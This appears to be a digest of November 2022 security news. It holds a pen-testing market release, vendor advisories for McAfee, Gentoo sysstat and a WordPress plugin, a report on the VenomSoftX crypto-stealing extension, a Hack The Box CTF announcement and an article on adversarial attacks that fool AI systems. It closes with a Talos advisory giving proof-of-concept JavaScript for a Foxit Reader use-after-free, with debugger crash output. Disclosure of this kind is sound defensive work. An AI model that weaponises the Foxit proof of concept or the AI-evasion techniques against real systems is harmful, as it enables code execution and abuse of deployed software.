Fueling the trend are the rising adoption of cloud computing solutions, technology advancements, stricter data safety regulations, and the move to digitalization, says Brandessence Market Research.

**LONDON, Nov. 23, 2022 /PRNewswire/** — The Global Penetration Testing Market is poised to reach a valuation of USD 5.28 Billion in 2028 from USD 1.87 Billion in 2021, registering a CAGR of 15.97% over the forecast duration.

Penetration test is referred to as a type of ethical hacking that is deliberately performed on a computer system to assess its security while identifying exploitable vulnerabilities. The testers adopt similar equipment, tool, and tactics used by cyberattacks. This is mainly done to deceive the criminals by distributing decoys and traps in the system that resemble the genuine assets. Organizations that are highly prone to cybercrime adopt this testing method to ensure the overall safety of their computer infrastructure.

The growth occurrences of cyberattacks, rising adoption of cloud computing solutions, along with technology advancements in the field are primarily augmenting the outlook of this business vertical. Further, the booming IT industry, stringent data safety regulations, and rapidly evolving technological infrastructure across various regions are creating lucrative opportunities for this marketplace to prosper.

Also, rising R&D activities in the field, surging digitalization trends across various industry verticals, coupled with increasing number of data centres worldwide, are adding traction to the development of Global Penetration Testing Market. Moreover, escalating demand for high-speed internet connection, rising popularity of remote working, and increasing incidences of cyberattack sophistication are stimulating the overall dynamics for this industry vertical. On the flip side, high costs pertaining to penetration tests and dearth of skilled professionals in the field are hindering the remuneration scope of this business sphere.

**Get Sample of \[email protected\] https://brandessenceresearch.com/downloadSample/PostId/2143**

**Competitive Hierarchy**

The prominent players characterizing the competitive Terrain of Global Penetration Testing Market are:

*   Checkmarx
*   Coalfire Systems
*   Core Security Technologies
*   FireEye
*   HackerOne Inc.
*   ImmuniWeb SA
*   Indium Software
*   International Business Machines Corporation
*   Netragard LLC
*   Netsparker Ltd
*   OffSec Services Limited
*   Micro Focus International plc
*   Acunetix
*   Others.

These companies are trying to enhance their position in the global market. They are adopting various strategies, including mergers & acquisitions, product launches, R&D investments, partnerships, and collaborations, among others to stay ahead of the curve.

**Global Penetration Testing Market Segmentation:**

**By Type:**

*   Wireless Network Penetration Testing Services
*   Network Penetration Testing
*   Web Application Penetration Testing
*   Social Engineering Penetration Testing
*   Mobile Application Penetration Testing
*   Others

**By Deployment:**

*   Cloud
*   On-premises

**By End-User:**

*   Healthcare
*   Government & Defense
*   Retail
*   BFSI
*   IT & Telecom
*   Others

**Category-Wise Outlook**

**Which is the leading deployment mode segment in this business sphere?**

The on-premises segment presently dominates the market in terms of volume share since it provides high control and flexibility to end-use enterprises which reducing the risks of data losses.

**Which end-user segment is poised to amass notable gains over the estimated timeline?**

The healthcare segment is anticipated to generate significant returns over the estimated timeline. This is credited to the rising adoption of EHR and telehealth solutions, which in turn increases the susceptibility of healthcare organizations to various forms of cybercrimes.

**Get Methodology @** **https://brandessenceresearch.com/requestMethodology/PostId/2143**

**Comparing the historical outlook and ongoing trends of this market**

This industry has been generating significant returns due to the presence of various expansion propellants across the globe.

There has been rising occurrence of cyberattacks across various industry verticals worldwide. In fact, the crime dwellers have begun adopting advanced technologies such as AI, analytics, and ML to sophisticate cyber-attacks. Such attacks tend to go unnoticed or undetected since most of the organizations lack preparedness and high-end tools. Many enterprises incur massive financial losses due to such attacks which in turn also affects their reputation in the market. This has increased the demand for effective tools and tactics to minimize the risk of sophisticated cybercrimes across numerous organizations.

The rising digitalization trend across a wide range of industries has resulted in the rising data privacy concerns. Due to widespread internet proliferation and growing adoption of smart devices, sectors such as healthcare, education, and retail, among others are trying to streamline their operations with an aim to reduce their overall expenses while leaving no room for human errors. But this has provided hackers with profitable opportunities since they can easily crack into the system of these organizations and procure confidential data. After getting their hands on these valuable assets, cybercriminals sell them on the dark web and earn massive profits. Therefore, many of these organizations have strengthened their cybersecurity entities which in turn is increasing the deployment of penetration testing solutions.

The onset of the COVID-19 pandemic is adding momentum to the progression of Global Penetration Testing market. Stringent lockdowns completely restricted the mobility of the masses and led to the temporary closure of commercial complexes. This pushed organizations to shift to a virtual mode of operations, thereby popularizing remote working trends. Unfortunately, this resulted in the surging occurrence of cyberattacks which in turn necessitated the deployment of effective tactics and tools to ensure user data safety and privacy during online communications, data transfer, and other activities.

**Region-Wise Insights**

**Which is the fastest growing region in this industry vertical?**

North America has emerged as one of the most rapidly growing regions in this marketplace owing to rapid internet proliferation, growing adoption of smart devices, and rising disposable income of the masses.

**How is Asia-Pacific faring in the marketplace?**

Asia Pacific is reckoned to capture a substantial revenue share over the forecast timeframe due to the rising occurrence of cyberattacks, the booming IT sector, and technological innovations in the field.

**Major Developments**

In June 2022, Synopsys announced the acquisition of Whitehat Security to strengthen its overall portfolio in this vertical.

**On Special Requirement,** **Penetration Testing Market Report is also available for regions listed below:**

**North America**

*   U.S, Canada

**Europe**

*   Germany, France, U.K., Italy, Spain, Sweden, Netherland, Turkey, Switzerland, Belgium, Rest of Europe

**Asia-Pacific**

*   South Korea, Japan, China, India, Australia, Philippines, Singapore, Malaysia, Thailand, Indonesia, Rest Of APAC

**Latin America**

*   Mexico, Colombia, Brazil, Argentina, Peru, Rest of Latin America

**Middle East and Africa**

*   Saudi Arabia, UAE, Egypt, South Africa, Rest Of MEA

**Purchase Copy of Report @ https://brandessenceresearch.com/Checkout?report\_id=2143**

**Related Reports:**

*   Security Information and Event Management Market is valued at USD 4.21 Billion in 2021 and is expected to reach USD 6.62 Billion by 2028 with a CAGR of 8.1% over the forecast period.
*   Security Orchestration Automation and Response (SOAR) Market is valued at USD 1.16 Billion in 2021 and is expected to reach USD 3.19 Billion by 2028 with a CAGR of 15.58% over the forecast period.
*   Application Security Market is valued at USD 7041.2 Million in 2021 and is expected to reach USD 20880.7 Million by 2028 with a CAGR of 16.8% over the forecast period.
*   Security and Vulnerability Management Market are valued at USD 11.26 Billion in 2021 and expected to reach USD 21.38 Billion by 2028 with a CAGR of 9.6% over the forecast period.
*   Chemical Sensor Market is valued at USD 25.46 Billion in 2021 and is expected to reach USD 42.23 Billion by 2028 with a CAGR of 7.5% over the forecast period.
*   Image Sensor Market is valued at USD 20.62 Billion in 2021 and is expected to reach USD 36.78 Billion by 2028 with a CAGR of 8.62% over the forecast period.
*   Ultrasonic Sensors Market is valued at USD 6.29 Billion in 2021 and expected to reach USD 13.74 Billion by 2028 with a CAGR of 11.8% over the forecast period.
*   Smart Sensors Market is valued at USD 42.74 Billion in 2021 and expected to reach USD 145.30 Billion by 2028 with the CAGR of 19.1% over the forecast period.
*   CMOS Image Sensor Market is valued at USD 16.82 Billion in 2021 and is expected to reach USD 23.04 Billion by 2028 with a CAGR of 8.65% over the forecast period.

**Brandessence Market Research & Consulting Pvt ltd.**

Brandessence Market Research publishes market research reports & business insights produced by highly qualified and experienced industry analysts. Our research reports are available in a wide range of industry verticals including aviation, food & beverage, healthcare, ICT, Construction, Chemicals, and lot more. Brand Essence Market Research report will be best fit for senior executives, business development managers, marketing managers, consultants, CEOs, CIOs, COOs, and Directors, governments, agencies, organizations, and Ph.D. Students. We have a delivery center in Pune, India, and our sales office is in London.

**Follow Us:** LinkedIn **Blog:** **Top 5 Electric Air Taxi Market**

SOURCE: Brandessence Market Research and Consulting Private Limited

Penetration Testing Market Size Is Projected to Reach $5.28B Globally by 2028

McAfee Total Protection prior to version 16.0.49 contains an uncontrolled search path element vulnerability due to the use of a variable pointing to a subdirectory that may be controllable by an unprivileged user. This may have allowed the unprivileged user to execute arbitrary code with system privileges.

NEW  **Introducing**

****Get savings**  
on protection**

The **Black Friday Sale** is here with all the discounts you expect on all-in-one protection.

Windows® | macOS® | Android™ | iOS® | ChromeOS™️

NEW  **Introducing**

****Personalized** protection**

All-in-one protection for your identity, privacy, and more. Includes antivirus, VPN, and Protection Score.

NEW  **Introducing**

****The ultimate protection** for your privacy**

We help you stay private and secure online with personal data removal from risky sites, $1M identity theft coverage, device protection, and more.

NEW  **Introducing**

****Stop fraud** before it starts**

Credit monitoring offers daily updates to your credit score, including alerts to changes that may signal identity fraud.​

NEW  **Introducing**

****Next-level confidence** for identity, privacy, and device protection​**

Our ultimate identity and privacy protection to confidently live life online, with comprehensive identity monitoring, credit monitoring, credit freeze and lock, up to $1M identity theft coverage, and help to remove your personal info online.

**Live your life online freely and confidently  
with award-winning online protection**

**$1 million in coverage**

Advanced plans include $1,000,000 coverage to cover eligible losses and fees due to identity theft and fraud.‡

**24/7/365 customer support**

Get around the clock assistance from friendly, knowledgable security experts.

**100% guaranteed**

We pledge to remove viruses on your devices or give you your money back, guaranteed.\*\*

****We’ve got your back****

Guided, personalized online protection that makes being safe simple, wherever you are.

**Do what you do online, we’ll protect your privacy**

**New!** Remove your personal info from the riskiest data broker sites that sell it with

Personal Data Cleanup

. We scan **2x data broker sites** compared to similar cybersecurity services. Available with our Premium and higher-tier plans.

Stay private with a **VPN** that turns on automatically for public Wi-Fi, protecting account credentials, search habits, and more.

**Take action to help prevent identity theft**

**New!**

Security Freeze

helps prevent unauthorized access to new or existing credit, bank, and utility accounts in your name. Available in Advanced plans.​

We help you monitor your email addresses, SSN, bank account and credit card numbers and more. If we detect a change, we'll alert you an average of **10 months sooner** than the competition.​​​

$1M identity theft coverage & restoration

is available in Advanced plans.​​

Get expanded monitoring with auto-renewal turned on.

**Protection Score keeps you safer**

Protection Score checks the health of your online protection and provides simple instructions to improve your security. Knowing how safe you are is the first step toward a safer life online—what's your Protection Score?

**Protect your computers and smartphones**

Get 24/7 protection with award-winning antivirus and safe browsing security. Avoid risky websites, and stay safe from phishing, viruses, hackers and ransomware.

Previous Next

**What our customers are saying**

I love the new UI experience, the app really needed the new look. The app **protects my device against viruses and malware really well**

\- Drew M

★ ★ ★ ★ ★

Use it on all my devices, trusted without problems! Also **the ID Protection is amazing...**.get it now.​

\- Joe

★ ★ ★ ★ ★

I feel much more **protected from identity theft, viruses, and malware**

\- M.B.

★ ★ ★ ★ ★

Easy to download and use. **Gives me peace of mind.**

\- Jeanne C

★ ★ ★ ★ ★

**I feel very secure with McAfee Security.** I get notifications of breaches and immediately take action to resolve them.

\- Kelly G

★ ★ ★ ★ ★

I have loved the VPN option and feel safer now when connecting to public wifi.

\- Su L

★ ★ ★ ★ ★

**Keeps me safe all the time,** is there right behind me doing its thing. Always a pleasure. Protects my desktop PC as well for going on 9 years now. No complaints.

\- Anglynn

★ ★ ★ ★ ★

Excellent! I am very happy with the way **McAfee blocks spam constantly** as well as other unwanted visitors.

\- Maxine P

★ ★ ★ ★ ★

Great relief from fear of Hackers. I have great confidence with McAfee products, they provide me **excellent service to all my family devices.** Keep up the good work.

\- Padma M

★ ★ ★ ★ ★

Makes me feel more safe when online. Love the VPN feature. Love the fact that it **keeps me informed about threats,** how to deal with or that they dealt with the problem.

\- Elain W

★ ★ ★ ★ ★

**VPN, Antivirus and safe WiFi all in one App.** Seemless automatic scanning. Has solved problems with Identity theft and unwanted spam. Great Safe Browsing feature.

\- Rudy C

★ ★ ★ ★ ★

I didn't realize how much of my personal information was out there.

\- Ed B

★ ★ ★ ★ ★

I like feeling confident that **McAfee is working to protect my personal information.**

\- Janis C

★ ★ ★ ★ ★

Easy to use and necessary to have. **Wonderful!**

\- Aris C

★ ★ ★ ★ ★

****Industry-leading** online  
protection loved by millions**

****Trusted security****

for over 600 million devices

****Highest rating****

for security by SE Labs

****42 million****

threats blocked per day

**Clean up and speed up with ​**McAfee PC Optimizer****

Get your PC running up to twice as fast and boost your internet with just a few clicks with PC Optimizer. We'll remove outdated files, optimize your system, and reclaim bandwidth. Say goodbye to frustrating lag and enjoy your life online.

****Try** McAfee Total Protection for free**

Stay safe. Experience more. With McAfee Total Protection, you can easily protect how you browse, game, and connect, now with identity and privacy protection. Try our all-in-one online protection free for 30 days. ​

Windows® | macOS® | Android™ | iOS® | ChromeOS™

****Complete protection** for your mobile online life**

With McAfee Mobile Security, extend your online protection and privacy with a simple, all-in-one security solution. Connect confidently from the palm of your hand wherever you go.

Scan this QR code to download the McAfee Security mobile app directly to your phone or tablet from the Apple or Google Play app store.

CVE-2022-43751: Antivirus, VPN, Identity & Privacy Protection | McAfee

An AI's "world" only includes the data on which it was trained, so it otherwise lacks context — opening the door for creative attacks from cyber adversaries.

Artificial intelligence and machine learning (AI/ML) systems trained using real-world data are increasingly being seen as open to certain attacks that fool the systems by using unexpected inputs.

At the recent Machine Learning Security Evasion Competition (MLSEC 2022), contestants successfully modified celebrity photos with the goal of having them recognized as a different person, while minimizing obvious changes to the original images. The most common approaches included merging two images — similar to a deepfake — and inserting a smaller image inside the frame of the original.

In another example, researchers from the Massachusetts Institute of Technology (MIT), University of California at Berkeley, and FAR AI found that a professional-level Go AI — that is, for the ancient board game — could be trivially beaten with moves that convinced the machine that the game had completed. While the Go AI could defeat a professional or amateur Go player because they used a logical set of movies, an adversarial attack could easily beat the machine by making decisions that no rational player would normally make.

These attacks highlight that while AI technology may work at superhuman levels and even be extensively tested in real-life scenarios, it continues to be vulnerable to unexpected inputs, says Adam Gleave, a doctoral candidate in artificial intelligence at the University of California at Berkeley, and one of the primary authors of the Go AI paper.

"I would default to assuming that any given machine learning system is insecure," he says. "\[W\]e should always avoid relying on machine learning systems, or any other individual piece of code, more than is strictly necessary \[and\] have the AI system recommend decisions but have a human approve them prior to execution."

All of this underscores a fundamental problem: Systems that are trained to be effective against "real-world" situations — by being trained on real-world data and scenarios — may behave erratically and insecurely when presented with anomalous, or malicious, inputs.

The problem crosses applications and systems. A self-driving car, for example, could handle nearly every situation that a normal driver might encounter while on the road, but act catastrophically during an anomalous event or one caused by an attacker, says Gary McGraw, a cybersecurity expert and co-founder of the Berryville Institute of Machine Learning (BIML).

"The real challenge of machine learning is figuring out how to be very flexible and do things as they are supposed to be done usually, but then to react correctly when an anomalous event occurs," he says, adding: "You typically generalize to what experts do, because you want to build an expert ... so it's what clueless people do, using surprise moves ... that can cause something interesting to happen."

**Fooling AI (And Users) Isn't Hard**

Because few developers of machine learning models and AI systems focus on adversarial attacks and using red teams to test their designs, finding ways to cause AI/ML systems to fail is fairly easy. MITRE, Microsoft, and other organizations have urged companies to take the threat of adversarial AI attacks more seriously, describing current attacks through the Adversarial Threat Landscape for Artificial-Intelligence Systems (ATLAS) knowledge base and noting that research into AI — often without any sort of robustness or security designed in — has skyrocketed.

Part of the problem is that non-experts who do not understand the mathematics behind machine learning often believe that the systems understand context and the world in which it operates. 

Large models for machine learning, such as the graphics-generating DALL-e and the prose-generating GPT-3, have massive data sets and emergent models that appear to result in a machine that reasons, says David Hoelzer, a SANS Fellow at the SANS Technical Institute. 

Yet, for such models, their "world" includes only the data on which they were trained, and so they otherwise lack context. Creating AI systems that act correctly in the face of anomalies or malicious attacks requires threat modeling that takes into account a variety of issues.

"In my experience, most who are building AI/ML solutions are not thinking about how to secure the ... solutions in any real ways," Hoelzer says. "Certainly, chatbot developers have learned that you need to be very careful with the data you provide during training and what kinds of inputs can be permitted from humans that might influence the training so that you can avoid a bot that turns offensive."

At a high level, there are three approaches to an attack on AI-powered systems, such as those for image recognition, says Eugene Neelou, technical director for AI safety at Adversa.ai, a firm focused on adversarial attacks on machine learning and AI systems.

Those are: embedding a smaller image inside the main image; mixing two sets of inputs — such as images — to create a morphed version; or adding specific noise that causes the AI system to fail in a specific way. This last method is typically the least obvious to a human, while still being effective against AI systems.

In a black-box competition to fool AI systems run by Adversa.ai, all but one contestant used the first two types of attacks, the firm stated in a summary of the contest results. The lesson is that AI algorithms do not make systems harder to attack, but easier because they increase the attack surface of regular applications, Neelou says.

"Traditional cybersecurity cannot protect from AI vulnerabilities — the security of AI models is a distinct domain that should be implemented in organizations where AI/ML is responsible for mission-critical or business-critical decisions," he says. "And it's not only facial recognition — anti-fraud, spam filters, content moderation, autonomous driving, and even healthcare AI applications can be bypassed in a similar way."

**Test AI Models for Robustness**

Like other types of brute-force attacks, rate limiting the number of attempted inputs can also help the creators of AI systems prevent ML attacks. In attacking the Go system, UC Berkeley's Gleave and the other researchers built their own adversarial system, which repeatedly played games against the targeted system, raising the victim AI's difficulty level as the adversary became increasingly successful.

The attack technique underscores a potential countermeasure, he says.

"We assume the attacker can train against a fixed 'victim' agent for millions of time steps," Gleave says. "This is a reasonable assumption if the 'victim' is software you can run on your local machine, but not if it's behind an API, in which case you might get detected as being abusive and kicked off the platform, or the victim might learn to stop being vulnerable over time — which introduces a new set of security risks around data poisoning but would help defend against our attack."

Companies should continue following security best practices, including the principle of least privilege — don't give workers more access to sensitive systems than they need or rely on the output of those systems more than necessary. Finally, design the entire ML pipeline and AI system for robustness, he says.

"I'd trust a machine learning system more if it had been extensively adversarially tested, ideally by an independent red team, and if the designers had used training techniques known to be more robust," Gleave says.

Adversarial AI Attacks Highlight Fundamental Security Issues

A malicious extension for Chromium-based web browsers has been observed to be distributed via a long-standing Windows information stealer called ViperSoftX.
Czech-based cybersecurity company dubbed the rogue browser add-on VenomSoftX owing to its standalone features that enable it to access website visits, steal credentials and clipboard data, and even swap cryptocurrency addresses via an

A malicious extension for Chromium-based web browsers has been observed to be distributed via a long-standing Windows information stealer called **ViperSoftX**.

Czech-based cybersecurity company dubbed the rogue browser add-on VenomSoftX owing to its standalone features that enable it to access website visits, steal credentials and clipboard data, and even swap cryptocurrency addresses via an adversary-in-the-middle (AiTM) attack.

ViperSoftX, which first came to light in February 2020, was characterized by Fortinet as a JavaScript-based remote access trojan and cryptocurrency stealer. The malware's use of a browser extension to advance its information-gathering goals was documented by Sophos threat analyst Colin Cowie earlier this year.

"This multi-stage stealer exhibits interesting hiding capabilities, concealed as small PowerShell scripts on a single line in the middle of otherwise innocent-looking large log files, among others," Avast researcher Jan Rubín said in a technical write-up.

"ViperSoftX focuses on stealing cryptocurrencies, clipboard swapping, fingerprinting the infected machine, as well as downloading and executing arbitrary additional payloads, or executing commands."

The distribution vector used to propagate ViperSoftX is typically achieved through cracked software for Adobe Illustrator and Microsoft Office that are hosted on file-sharing sites.

The downloaded executable file comes with a clean version of cracked software along with additional files that set up persistence on the host and harbor the ViperSoftX PowerShell script.

Newer variants of the malware are also capable of loading the VenomSoftX add-on, which is retrieved from a remote server, to Chromium-based browsers such as Google Chrome, Microsoft Edge, Opera, Brave, and Vivaldi.

This is achieved by searching for LNK files for the browser applications and modifying the shortcuts with a "\--load-extension" command line switch that points to the path where the unpacked extension is stored.

"The extension tries to disguise itself as well known and common browser extensions such as Google Sheets," Rubín explained. "In reality, the VenomSoftX is yet another information stealer deployed onto the unsuspecting victim with full access permissions to every website the user visits from the infected browser."

It's worth noting that the --load-extension tactic has also been put to use by another browser-based information stealer referred to as ChromeLoader (aka Choziosi Loader or ChromeBack).

VenomSoftX, like ViperSoftX, is also orchestrated to steal cryptocurrencies from its victims. But unlike the latter, which functions as a clipper to reroute fund transfers to an attacker-controlled wallet, VenomSoftX tampers with API requests to crypto exchanges to drain the digital assets.

Services targeted by the extension include Blockchain.com, Binance, Coinbase, Gate.io, and Kucoin.

The development marks a new level of escalation to traditional clipboard swapping, while also not raising any immediate suspicion as the wallet address is replaced at a much more fundamental level.

Avast said it has detected and blocked over 93,000 infections since the start of 2022, with a majority of the impacted users located in India, the U.S., Italy, Brazil, the U.K., Canada, France, Pakistan, and South Africa.

An analysis of the hard-coded wallet addresses in the samples reveals that the operation has netted its authors a sum total of about $130,421 as of November 8, 2022, in various cryptocurrencies. The collective monetary gain has since dropped to $104,500.

"Since the transactions on blockchains/ledgers are inherently irreversible, when the user checks the transaction history of payments afterward, it is already too late," Rubín said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

This Malware Installs Malicious Browser Extensions to Steal Users' Passwords and Cryptos

Multiple Cross-Site Request Forgery vulnerabilities in All-In-One Security (AIOS) – Security and Firewall (WordPress plugin) <= 5.1.0 on WordPress.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Report  

Monitoring Not reported to be exploited

Vulnerable versions

<= 5.1.0

PSID 

56c1bbdd9608

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A8: Cross Site Request Forgery (CSRF)

Publicly disclosed

2022-11-22

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were discovered by Rafie Muhammad (Patchstack) in the WordPress All In One WP Security plugin (versions <= 5.1.0).

**Solution**

Update the WordPress All In One WP Security & Firewall plugin to the latest available version (at least 5.1.1).

**References**

CVE-2022-44737: WordPress All In One WP Security plugin <= 5.1.0 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

**Tuesday, November 22 —** As the cyber skills gap widens to record new levels, disruptive cybersecurity training and upskilling platform, **Hack The Box** (HTB), has announced its **annual global University ‘Capture the Flag’ (CTF) competition** that will take place from **December 2-4, 2022**.

This year’s event, which is **open to students and academics at higher education institutions worldwide**, is designed to inspire and prepare a new generation of security professionals to join the fight against cybercrime, at a time when they are most needed with the global talent shortage standing at 3.4 million. 

**With attacks spiking 28% in the last quarter of 2022** alone, and cybercrime predicted to cost the global economy **$10.5 trillion** **by 2025**, students taking part will learn only the latest practical hacking skills needed to combat the ever-growing and evolving volume of sophisticated threats. Higher education professionals will also be introduced to innovative and effective new methods of gamified and hands-on teaching.

HTB’s University CTF will see students across the globe face **over 20 sophisticated cyber challenges**, testing their skills in Cloud, Crypto, Pwn, Web, Forensics and more. This year’s challenges replicate the latest attack scenarios and cybercriminal techniques, helping to ensure students of all levels are prepared for a career in modern day cybersecurity.

This year’s CTF aims to shine a light on cyberbullying and create an inclusive space where students all over the world can gain access to the latest skills and networks but also learn in an interactive**, enjoyable and safe environment**. Titled **‘Supernatural Hacks’** this year’s CTF focuses on helping students to interact safely online and build their digital citizenship, all whilst teams work together in a fictional wizarding world to defeat cybers darkest villains. Proceeds from the competition are being donated to Cybersmile, a multi-award- winning nonprofit organisation committed to digital wellbeing and tackling all forms of abuse and bullying online.

**Haris Pylarinos, CEO and co-founder of Hack The Box**, says: _“Universities are the breeding ground for the next generation of cyber professionals, and its critical students have experience tackling real world threats. The massive rise in the volume and sophistication of cyberattacks, means demand for new skills is booming and the old ways are no longer working.”_

_“CTFs are a highly effective way to learn hands-on cyber skills through fun, gamified content. We’re seeing students join to not only sharpen their skills but also network with like-minded peers looking to enter a career in cyber. The competition is also an opportunity for academics and universities to learn new teaching methods that promote a ‘hacking mindset’ approach, needed to match the current threat landscape.”_

**Haris continues** “_The game has changed in cyber. Arbitrary degree and qualification hiring criteria needs to be phased out and businesses must prioritise practical-based skills and training experience. This will help cut the red tape holding back an untapped pool of highly skilled cyber talent waiting in the wings._

_Meanwhile, for younger generations increasingly looking for professions with purpose, hacking presents not only lucrative career prospects but an opportunity to do meaningful work stopping cybercriminal online - protecting businesses, governments, hospitals, schools and individuals from dangerous real-life threats. We’re excited to continue preparing the hackers of the future.”_

Last year’s University CTF winners included players from some of the biggest universities and schools in the world, **University of Warwick**, **Hasso-Plattner Institute** and **42 Paris**. With more students looking to upskill themselves than ever, HTB University CTF has also seen a **191% increase in participatio**n from 2021 to 2021, with 2022 set to see record levels of participants.

Teams, consisting of 1- 20 players, can enter the CTF from anywhere. All skill levels are welcome with challenge categories ranging from ‘Beginner to Hard’. The CTF style will be Jeopardy and FullPwn. As well as cash, swag prizes, and certificates of attendance can be earned for taking part

Hack The Box’s University CTF is sponsored by EY.

**Registration closes on** **November 30. Sign up** **here.**

Hack The Box Launches Annual University CTF to Inspire Next Generation of Security Professionals

Gentoo Linux Security Advisory 202211-7 - An integer overflow vulnerability has been found in sysstat which could result in arbitrary code execution. Versions less than 12.7.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: sysstat: Arbitrary Code Execution  
     Date: November 22, 2022  
     Bugs: #880543  
       ID: 202211-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
An integer overflow vulnerability has been found in sysstat which could  
result in arbitrary code execution.

Background  
=========  
sysstat is a package containing a number of performance monitoring  
utilities for Linux, including sar, mpstat, iostat and sa tools.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-admin/sysstat          < 12.7.1                    >= 12.7.1

Description  
==========  
On 32 bit systems, an integer overflow can be triggered when displaying  
activity data files.

Impact  
=====  
Arbitrary code execution can be achieved via sufficiently crafted  
malicious input.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All sysstat users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/sysstat-12.7.1"

References  
=========  
[ 1 ] CVE-2022-39377  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39377

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202211-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-07

A use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 12.0.1.12430. By prematurely destroying annotation objects, a specially-crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.

**SUMMARY**

A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 12.0.1.12430. By prematurely destroying annotation objects, a specially-crafted PDF document can trigger the reuse of previously freed memory, which can lead to arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially-crafted, malicious site if the browser plugin extension is enabled.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.0.1.12430

**PRODUCT URLS**

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-416 - Use After Free

**DETAILS**

Foxit PDF Reader is one of the most popular PDF document readers and has a large user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles certain events of form elements, such as text fields or buttons. This can be illustrated by the following proof-of-concept code:

    function main() {
    
    getField("txt2").setAction("OnBlur",'f20();');
    getField('txt2').setFocus();
    this.addAnnot({page: 1, type: "Stamp", point: [6,13,12,16],state : 0,popupOpen : true,callout : "",lineEnding :0,name :"b"}); 
    
    }
    
    
    
    function f20() { 
    
    this.getAnnots()[0].destroy(); 
    
    }
    

The above code simply assigns a callback function to ‘OnBlur’ action for field txt2. Next, a new annotation is created which promptly makes the field txt2 lose focus, triggering its callback. In the action callback, the newly created annotation is immediately destroyed, which ends up freeing the associated memory. We can observe the following in the debugger at the time of the crash:

    (21b0.1d4c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=07afdf34 ecx=17c7a87d edx=0c4b0000 esi=27a9afe8 edi=07afdf54
    eip=02ce68a7 esp=07afded0 ebp=07afdf20 iopl=0         nv up ei pl nz ac pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
    FoxitPDFReader!safe_vsnprintf+0xe252c7:
    02ce68a7 8b06            mov     eax,dword ptr [esi]  ds:002b:27a9afe8=????????
    0:000> u
    FoxitPDFReader!safe_vsnprintf+0xe252c7:
    02ce68a7 8b06            mov     eax,dword ptr [esi]
    02ce68a9 8bce            mov     ecx,esi
    02ce68ab 8b4040          mov     eax,dword ptr [eax+40h]
    02ce68ae ffd0            call    eax
    02ce68b0 84c0            test    al,al
    02ce68b2 7469            je      FoxitPDFReader!safe_vsnprintf+0xe2533d (02ce691d)
    02ce68b4 f30f1045fc      movss   xmm0,dword ptr [ebp-4]
    02ce68b9 0f57c9          xorps   xmm1,xmm1
    0:000> k 8
     # ChildEBP RetAddr      
    WARNING: Stack unwind information not available. Following frames may be wrong.
    00 07afdf20 02c60f8f     FoxitPDFReader!safe_vsnprintf+0xe252c7
    01 07afe11c 02c331f2     FoxitPDFReader!safe_vsnprintf+0xd9f9af
    02 07afe170 02f54d9b     FoxitPDFReader!safe_vsnprintf+0xd71c12
    03 07afe1b8 03138a8b     FoxitPDFReader!FXJSE_GetClass+0x26b
    04 07afe220 0313824e     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e361b
    05 07afe2b4 03138505     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e2dde
    06 07afe2fc 0313838b     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3095
    07 07afe318 0335a53b     FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e2f1b
    0:000> !heap -p -a esi
        address 27a9afe8 found in
        _DPH_HEAP_ROOT @ c4b1000
        in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                       2f1c11d4:         27a9a000             2000
        64e3ae02 verifier!AVrfDebugPageHeapFree+0x000000c2
        77b82c91 ntdll!RtlDebugFreeHeap+0x0000003e
        77ae3c45 ntdll!RtlpFreeHeap+0x000000d5
